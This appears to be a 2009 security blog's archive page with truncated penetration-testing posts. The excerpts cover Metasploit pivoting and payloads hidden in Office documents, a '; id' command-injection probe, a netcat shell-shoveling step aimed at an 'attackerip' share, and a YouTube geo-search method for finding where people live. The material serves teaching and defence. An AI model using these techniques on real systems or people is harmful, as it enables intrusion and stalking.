Showing posts from 2009

Welcome to Mark Baggett - In Depth Defense

I am the course Author of SANS SEC573 Automating Information Security with Python. Check back frequently for updated tools and articles related to course material.

TCP Fragment Evasion

Originally posted on

By: Mark Baggett

I recently read a very good article on tuning Snort's Stream5 preprocessor to avoid "TCP Fragment Overlap" attacks. It's a great article, but the wording confused me. I thought to myself, "TCP Fragments? That must be a mistake. The TCP header doesn't have a 'more fragments' bit, a 'fragment offset' or anything else to support fragmentation. How can there be any TCP fragments?" Typically when we talk about fragmentation attacks we think about Layer 3 attacks. Attackers manipulate the IP packet headers to pull off various insertion and evasion attacks. Examples of Layer 3 attacks include overlapping fragment attacks and temporal evasion (host reassembly timeout evasion). These attacks are explained pretty well in an article titled "Evading NIDS, revisited".
So what is TCP or Layer 4 "fragmentation"? Really, it's overl…

Posts moving to PaulDotCom

I'm joining the guys at Pauldotcom. They have invited me to post my blog entries on their site. As posts go up on their site I'll provide a link to them here and I'll post some less technical notes here. I'm pretty excited about the opportunity to work with those guys and looking forward to it.

Don't forget to wipe!

A while back I assisted the FBI in the collection of evidence against a now convicted sexual offender. The guy had a hard drive full of child porn. My customer had suspicions that an employee in a remote office was accessing inappropriate material on their work computer and asked that I investigate it remotely. After finding one photo of a very young girl among a collection of "normal" porn and discussing it with my customer, I immediately dialed my contact at the FBI. (Good contacts are ESSENTIAL; don't wait until you need them to try and make them.) Although the young girl was clothed in the picture I saw, the lingerie and the pose she was in were very disturbing and you just knew you didn't want to see anything else. At that point I froze; anything else that was touched remotely was altering and potentially destroying evidence on the remote drive. Within an hour the FBI was at the office. He used my machine and the access I had gained to briefly verify the content…

Good enough Compliance??

Check out this article..

What is "Good enough Compliance?" You either ARE compliant or you ARE NOT. It's a switch. The article should be a guide to "Good enough security". Good security is not the same as being compliant. I would much rather have good security than be compliant with any given regulation. But good security often covers many of the security requirements outlined in compliance standards. Two things came to mind reading the article.

1) Don't trust Sony Pictures with any personal data or credit card information.
2) How many data breaches are REALLY happening?

What does this paragraph suggest?
"According to Behnam Dayanim, a privacy attorney with Paul, Hastings, Janofsky & Walker, state security breach notification laws are among the most frequently ignored types of security regulation. About 35 states have passed security breach…

Interesting story on US Cyber attack

"Just after midnight on Thursday, April 9, unidentified attackers climbed down four manholes serving the Northern California city of Morgan Hill and cut eight fiber cables in what appears to have been an organized attack on the electronic infrastructure of an American city. Its implications, though startling, have gone almost un-reported."

Snort 3.0 SANS Paper

Here is a great SANS GCIA Gold paper for anyone interested in Snort 3.0. Doug also created a very nice bootable live cd with Snort 3.0, Sguil, and other tools from the 503 track. Check him out at

No exploit Metasploit usage - VNC and Keylogging

OK. I admit it. I use Metasploit at work. Of course, I have permission to use it as a penetration testing tool, but I find it to be very useful in other circumstances as well. I often use the PSEXEC "exploit" to provide a username and password to fully patched machines for administrative purposes. For example, it has come in handy when the standard remote access tools have been removed and there is a remote machine that the support center is unable to access. They, rightly so, have figured out that if the security team can get into their machines without usernames and passwords, it should be pretty easy for them to help recover a managed machine with known usernames and passwords. One option to troubleshoot the broken admin software is to remotely (and temporarily) install VNC on the stranded host. I used to connect to the remote c$ with administrator credentials, copy up VNC, import the required registry keys, start the server, fix the problem, clean up the regi…

Metasploit adds new keylogger and Mac payloads

Metasploit added some pretty interesting payloads to its arsenal this week. First, Meterpreter (the only payload you'll ever need) added a keylogger. Plus, they have added some cool payloads for the Mac. There is a set of iSight payloads that will snap a picture from the iSight camera (bind_tcp, reverse_tcp, etc.). This payload is part of the "bundle inject" payload, which is documented in the Mac OS X Hacker's Handbook; this looks like it could be the beginning of a Meterpreter-like pluggable payload for OS X. Charlie Miller, winner of the new Macintosh Powerbooks at both the 2008 and 2009 Pwn2Own contests, is coauthor of the payloads along with Dino Dai Zovi. That is definitely a book I will be adding to my library. Here is a recent presentation with some interesting information on the payloads.

SANS 504 - Hacking Techniques, Exploits and Incident Response Augusta, GA

I'm going to mentor another SANS 504 session this fall. Hacking Techniques, Exploits and Incident Response is one of my favorite SANS classes. This is my third mentor session and my second time running 504. Last year SANS gave me the Mentor of the Year award, so they are giving me some additional flexibility in the mentor format. This time we are running a modified mentor format. We will have 13 more hours of class time than the normal mentor session. That's more time for covering the materials and doing exercises. If you're interested, get full details and sign up here. Greater Augusta ISSA members, contact me for a very special discount code.

Using the free Nessus feed on your Mac

Tenable has changed their license and you can no longer use their vulnerability feeds for commercial use. has a free Nessus feed you can subscribe to. It is available for use here. You will notice two update programs there: one for Unix and one for Windows. What about the Mac? To subscribe to the Nessus feeds on your Macintosh, do this:
1) Download the Linux update script.
2) Update it so it works on your Mac as described below.
First, in the "#Plugin dir" section you will need to change the line that reads:
NVT_DIR="/var/lib/nessus/plugins/" to NVT_DIR="/Library/Nessus/run/lib/nessus/plugins"

3) chmod +x
If you run the script by typing:
./  nessus 
you will see an error about not being able to find the command "md5sum". The Nessus feed update did work, but the script was unable to compare the hashes to verify it completed successfully. That might be good enough for you and you c…

Reverse Pivots with Metasploit - How NOT to make the lightbulb

In a penetration test your target is PII kept on a corporate file server which I will call Victim2. You are outside the firewall but have gained access to an internal host, Victim1, when a user opened your Word document with an embedded Meterpreter payload. The stager embedded in the Word document made a REVERSE_TCP connection to your machine, which uploaded metsrv.dll to the victim. The machine you have access to (Victim1) has unfiltered access to your target (Victim2). Victim2 is vulnerable to ms08_067_netapi. Victim2, however, has NO access to the internet at all. Were it not for the strict egress firewall rules controlling Victim2, you could have used the ROUTE command to pivot your attack through your Meterpreter session on Victim1 to Victim2, and have Victim2 send you a shell directly like this...

Your IP = Victim1 = Victim2 =
Background session 1? [y/N] y msf exploit(ms08_067_netapi) > route add 1 msf exploit(ms08_067…

I know where you live... or at least google does

Can you use to find out where a video was uploaded? I’m not saying you can. I’m not saying you can’t. But I think it is interesting to try. Using the following method YouTube has led me to the homes of a few people I know. Does it work for you??

Start with YouTube's "Advanced Search".

Click "Advanced Options" and "Show Map". Type in the userid of the person you're trying to locate and click the SEARCH box inside the advanced search box (not the one at the top). If the video is in the circle it will be displayed in the result. If not, you will see "No Videos found for xyz" and a playlist for the user you are searching for. The difference between a hit and a no-hit is subtle. Do a search for something you know is geoencoded so you can see the difference. As a rule, if you see this, then the video is not in the circle.

No videos found for “USERXYZ”
Playlist Results for USERXYZ

Zoom in one click at a time making your circle smal…

WebInspect and Arbitrary Command Execution

I won't be the first to say it, but it's worth repeating: no scanner is a substitute for a human penetration test. That said, I find that WebInspect saves me a lot of time and often either finds vulnerabilities for me OR, just as often, generates error messages that lead me to finding issues pretty quickly. I like to think of it as a web app fuzzer on steroids. Here is a custom signature I've added to help me cover my bases.
When WebInspect scans for arbitrary command execution, it will only detect the flaw when the results of the command execution are returned to the browser. For example, it will inject "; id" into all the fields on a page. If it doesn't see "uid=0(root) " (or preferably the uid for a less privileged apache httpd user) returned from the web server somewhere in that response, then it doesn't detect the vulnerability. But the web server very well may have executed code invisibly. Consider this example:
A website has a…

Today is a good day!

First I learned via Wesley McGrew's website that I won Ed Skoudis' December hacking challenge.  When I look at the list of people who submitted answers, I feel really good to be included in that list of "notable security studs".    Thanks to Ed for putting together a fun challenge.  I always learn a lot any time I do anything related to Jedi Master Skoudo.
Challenge results

THEN I see this entry on Wesley's blog on pretending to be a printer with netcat. It occurs to me that this is the other end of my netcat w/o netcat shell shoveling attempts I blogged about back in April 08. Using that technique I was able to shovel command output to netcat running on an arbitrary port. But I really want a bidirectional interactive shell. The thought is this.
1) Share a netcat listener on my Linux box over SMB.
2) That netcat printer share must be a BIDIRECTIONAL printer and not be spooled.
3) Net use lpt1 \\attackerip\netcatshare
4) lpt1 (The 16 bit p…

Infeasibility of Modeling Polymorphic Shellcode

This is a very interesting paper from some smart people at Columbia University. Here is my layman's summary for the terminally lazy:

Intro (paraphrase):
We are going to model the feasibility of modeling polymorphic shellcode to see if we can rely on antivirus heuristics and behavioral detection techniques.

Body (paraphrase):
Examine a ton of models & do some math that makes my head hurt.

"Our empirical results demonstrate the difficulty of modeling polymorphic behavior. We briefly summarized the achievements of the shellcoder community in making their code polymorphic and examined ways to improve some of these techniques. We presented analytical methods that can help assess the capabilities of polymorphic engines and applied them to some state-of-the-art engines. We explained why signature–based modeling works in some cases and confirmed that the viability of such approaches matches the intuitive belief that polymorphism will eventually defeat these methodologies.…

Door Schedule Fail

Huh? I see this sign frequently. So I went ahead and figured it out. The diagram below reveals the door schedule. I assigned a number to each of the times the door is closed: 1 = 9:30 pm - 4:00 am; 2 = Monday - Friday; 3 = 9:30 pm; etc. So I guess they only unlock the stairwells on weekends when no one is in the office. Must be a security measure. :)

Time               Sat, Sun   Mon        Tues-Thurs   Friday    Holidays
00:00am-04:00am    1          1,2,5      1,2          1,2,4     1,6
4:01-9:29pm        OPEN       2,5        2            2         6
9:30pm             1,3        1,2,3,5    1,2,3        1,2,3     1,3,6
9:31pm-11:59 pm    1          1,2,5      1,2          1,2       1,6

Metasploit Visual Basic Payloads in action

John Strand turned me on to this at CDI in December. We were talking about my presentation on the effectiveness of antivirus in detecting Metasploit payloads and he asked if I had done any testing on the Visual Basic payloads. At the time I had not, but now I have to agree with John's assertion that this is potentially a very scary and powerful feature. Metasploit payloads can easily be embedded in Microsoft Office documents and, as you might expect if you've read my previous blogs, antivirus software does not detect the payloads. I made a video to demonstrate the creation and use of the payloads.

To mitigate these attacks you can use Group Policy to set your Office document macro security to HIGH. You could use the Medium setting if you work for that mythical company where users don't ignore security warnings. Here are some helpful links:

Setting Macro Levels
Office Group Policy Templates

Or click here to check it out!

Who would you trust?

There is no shortage of stories about infected digital picture frames out there. The SANS Internet Storm Center has had several posts on the subject. When Santa brought my daughter a Sakar "Portable Digital Picture Frame" I was sure to scan it with some antivirus software. Sure enough, McAfee reports a Trojan exists on the device. I checked the manufacturer's support page and found this note in the product FAQ:
"Does my product have a virus? No. It has come to our attention that some versions of McAfee Antivirus are warning users about a potential virus in one of our files. We have confirmed that this is a false positive. There is no virus and users can install and use their frame without any fear of a virus infection. To avoid any installation issues, we suggest McAfee be temporarily suspended during installation and use. Users of Symantec and other antivirus products are not affected."
Other antivirus products are not affected.  It must just be a McAfee …